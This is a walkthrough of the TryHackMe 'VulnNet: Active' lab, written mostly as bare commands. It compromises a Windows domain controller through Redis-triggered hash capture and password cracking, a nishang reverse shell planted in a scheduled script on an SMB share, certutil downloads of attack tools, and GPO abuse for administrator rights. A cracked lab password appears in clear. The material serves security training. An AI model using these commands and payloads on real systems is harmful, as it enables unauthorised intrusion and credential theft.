Room Link: https://tryhackme.com/r/room/vulnnetactive
Scans
Kali
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/139 - NetBIOS
Kali
Kali
TCP/445 - SMB
No results. Couldn't login anonymously.
Kali
smbclient -L //$VICTIM/
TCP/6379 - Redis
Added active.thm
Kali
redis-cli -h active.thm
Kali(redis-cli)
Kali
responder -I ens5 -dvw
Kali(redis-cli)
eval "dofile('//$KALI/share')" 0
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
TCP/445 - SMB
Kali
smbclient -L //$VICTIM/ -U enterprise-security
Password: sand_0873959498
Download files
Kali
smbclient \\\\$VICTIM\\Enterprise-Share -U enterprise-security
Password: sand_0873959498
Kali(smbclient)
Kali
cat PurgeIrrelevantData_1826.ps1
Initial Shell
Kali
git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1
Kali(subl)
Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444
Kali
cp Invoke-PowerShellTcp.ps1 PurgeIrrelevantData_1826.ps1
Upload payload
Kali(smbclient)
put PurgeIrrelevantData_1826.ps1
After a few moments we get a connection
Kali
Privilege Escalation
Download SharpHound PS1
This failed because when running the script it would just hang and I had to reset the server. So After I tried with the exe.
Kali
git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.ps1 .
python2 -m SimpleHTTPServer 82
Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpHound.ps1 SharpHound.ps1
powershell -ep bypass
.\SharpHound.ps1
Download SharpHound EXE
Kali
git clone https://github.com/BloodHoundAD/BloodHound.git
cp BloodHound/Collectors/SharpHound.exe .
python2 -m SimpleHTTPServer 82
Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpHound.exe SharpHound.exe
SharpHound.exe
Transfer results to Kali
Victim(Powershell)
copy 20240405092615_BloodHound.zip C:\Enterprise-Share\
Kali(smbclient)
get 20240405092615_BloodHound.zip
BloodHound
Kali #1
Kali #2
bloodhound --no-sandbox
We can just drag the zip file to bloodhound to import it.
Find Shortest Paths to Domain Admins
Our user enterprise-security has write access to the GPO called "SECURITY-POL-VN"
SharpGPOAbuse
Kali
git clone https://github.com/byronkg/SharpGPOAbuse.git
cp SharpGPOAbuse/SharpGPOAbuse-master/SharpGPOAbuse.exe .
python2 -m SimpleHTTPServer 82
Victim(Powershell)
certutil -urlcache -f http://$KALI:82/SharpGPOAbuse.exe SharpGPOAbuse.exe
This task is running one command which is to add our user enterprise-security to the administrator group
Victim(Powershell)
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
After the change is successful we just need to push the GPU for it to work.
Victim(Powershell)
Kali
psexec.py enterprise-security:sand_0873959498@$VICTIM
